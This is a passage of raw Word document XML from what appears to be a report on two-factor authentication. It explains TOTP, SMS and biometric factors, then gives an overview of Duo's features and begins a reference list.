        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b. Time-Based One-Time Password (TOTP): The user generates a one-time password using an authenticator app like Google Authenticator or Authy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E64DAB" w14:textId="2724C62D" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c. Biometric Authentication: The user provides a biometric identifier such as a fingerprint, facial recognition, or iris scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFD7CD" w14:textId="48D36811" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verification and Access Grant: The system verifies the second factor provided by the user. If the second factor is valid, access to the protected resource is granted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73970E62" w14:textId="714C2518" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To implement 2FA, several techniques are employed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FC369" w14:textId="77777777" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Time-Based One-Time Password (TOTP) Algorithm: This algorithm generates a one-time password based on a shared secret key and the current time. The secret key is securely stored on the user's device and the server. The authenticator app uses this key to generate time-based passwords that are synchronized between the server and the user's device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C845B9" w14:textId="77777777" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778B6C06" w14:textId="11381085" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Short Message Service (SMS): In this technique, the user receives a one-time code via SMS on their registered phone number. The code is typically valid for a short duration and must be entered into the system to complete the authentication process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15D714" w14:textId="2EDE691A" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biometric Authentication: Biometric techniques use unique physical or behavioral characteristics of an individual for authentication. The user's biometric data, such as fingerprints or facial features, is stored securely and used to match against the provided biometric sample during the authentication process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20651BEC" w14:textId="2572D96C" w:rsidR="00850308" w:rsidRPr="00850308" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The working principle of 2FA is based on the concept of "something you know" (e.g., password) combined with "something you have" (e.g., smartphone, security key) or "something you are" (e.g., biometric). By requiring both factors, even if an attacker gains access to one factor, they would still need the second factor to successfully authenticate and gain access to the protected resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D818C4" w14:textId="6A1AA616" w:rsidR="008404DA" w:rsidRDefault="00850308" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850308">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2FA significantly enhances security by mitigating the risks associated with password-based authentication alone, as it adds an additional layer of protection against unauthorized access and helps prevent account compromise even if the password is compromised or stolen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B629554" w14:textId="3C310172" w:rsidR="00F660FC" w:rsidRPr="00502293" w:rsidRDefault="00F660FC" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502293">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo two-factor authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16711E34" w14:textId="77777777" w:rsidR="00F660FC" w:rsidRDefault="00F660FC" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F660FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo two-factor authentication is a security solution that adds an extra layer of protection to the login process by requiring users to provide two forms of identification. It helps mitigate the risk of unauthorized access even if an attacker obtains or guesses the user's password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F114F7A" w14:textId="6DFA3DE0" w:rsidR="00F660FC" w:rsidRDefault="00F660FC" w:rsidP="00850308">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F660FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Here's an overview of Duo two-factor authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424AFCA" w14:textId="23F233D2" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How Duo Two-Factor Authentication Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAC4C0" w14:textId="1A59EC8D" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User Login: When a user attempts to log in to a protected application or system, they enter their username and password as the first factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D49B31" w14:textId="499B2D13" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Second Factor Verification: After entering the credentials, Duo prompts the user to provide a second factor for verification. This second factor can be one of the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611D1AE0" w14:textId="087E5D3D" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Push Notification: Duo sends a push notification to the user's registered device (such as a smartphone). The user approves or denies the login attempt directly from the device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CBAF2B" w14:textId="24D3B730" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One-Time Passcode (OTP): The user receives a time-based OTP via SMS, phone call, or generated by a Duo mobile app. The user enters the OTP to complete the authentication process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69277D6F" w14:textId="3D5EAF5C" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>U2F Token: A physical security key or USB token is used as the second factor, requiring the user to insert or tap the key to authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A3150" w14:textId="69D43D11" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biometric Verification: Duo can also integrate with biometric authentication methods, such as fingerprint or face recognition, as the second factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E379FBA" w14:textId="2E972D0F" w:rsidR="0012289B" w:rsidRDefault="0012289B" w:rsidP="0012289B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012289B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Benefits of Duo Two-Factor Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A85EE1" w14:textId="6EB3F16A" w:rsidR="00FD4EDD" w:rsidRDefault="00FD4EDD" w:rsidP="00FD4EDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4EDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enhanced Security: Two-factor authentication provides an additional layer of security, significantly reducing the risk of unauthorized access, even if passwords are compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08416568" w14:textId="273D6D5F" w:rsidR="00FD4EDD" w:rsidRDefault="00FD4EDD" w:rsidP="00FD4EDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4EDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User-Friendly: Duo offers various authentication methods, including push notifications, which provide a seamless and user-friendly experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A999738" w14:textId="2F124B58" w:rsidR="00FD4EDD" w:rsidRDefault="00FD4EDD" w:rsidP="00FD4EDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4EDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Easy Integration: Duo supports integration with a wide range of applications, platforms, and systems, making it easy to implement two-factor authentication across an organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE13D44" w14:textId="45D2D515" w:rsidR="00FD4EDD" w:rsidRDefault="00FD4EDD" w:rsidP="00FD4EDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4EDD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Administrative Controls: Administrators have visibility and control over user authentication, allowing them to set policies, enforce security measures, and monitor authentication attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4445529B" w14:textId="07F810D5" w:rsidR="00785467" w:rsidRDefault="00785467" w:rsidP="00785467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00785467">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo Access Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA5F92" w14:textId="5B6092D8" w:rsidR="00785467" w:rsidRDefault="00785467" w:rsidP="00785467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00785467">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo Access Gateway extends two-factor authentication to cloud-based applications and remote access environments, providing secure access controls for users connecting from outside the corporate network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE454F" w14:textId="778256C1" w:rsidR="002274CB" w:rsidRDefault="002274CB" w:rsidP="002274CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002274CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Management and Reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E47133C" w14:textId="3FC89BCD" w:rsidR="002274CB" w:rsidRDefault="002274CB" w:rsidP="002274CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002274CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo provides a centralized administrative portal where administrators can manage user accounts, configure authentication policies, and generate reports on user activity and authentication events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DDE35" w14:textId="58F0DFA8" w:rsidR="00A12940" w:rsidRDefault="00A12940" w:rsidP="00A12940">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12940">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12940">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s important to note that Duo two-factor authentication is just one example of a two-factor authentication solution. Other providers and solutions may have similar or additional features to enhance authentication security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B15F460" w14:textId="69596C4B" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C5CC1" w14:textId="694345E2" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo Security - Official Website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCDE72" w14:textId="1F2ABDD5" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
